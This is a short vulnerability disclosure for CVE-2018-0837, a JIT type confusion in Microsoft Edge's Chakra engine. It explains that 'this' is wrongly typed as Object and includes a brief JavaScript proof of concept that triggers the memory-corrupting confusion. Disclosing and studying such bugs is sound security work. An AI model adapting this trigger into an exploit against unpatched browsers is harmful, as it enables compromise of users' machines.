Microsoft Edge Chakra JIT LdThis Type Confusion

`Microsoft Edge: Chakra: JIT: LdThis type confusion   
  
CVE-2018-0837  
  
  
LdThis instructions' value type is assumed to be "Object". Since "this" can be other objects like an array, it has to be assumed to be "LikelyObject", otherwise, operations to "this" will not be checked properly.  
  
PoC:  
function opt(arr) {  
arr[0] = 1.1;  
this[0] = {};  
arr[0] = 2.3023e-320;  
}  
  
function main() {  
let arr = [1.1];  
for (let i = 0; i < 10000; i++) {  
opt.call({}, arr);  
}  
  
opt.call(arr, arr);  
print(arr);  
}  
  
main();  
  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`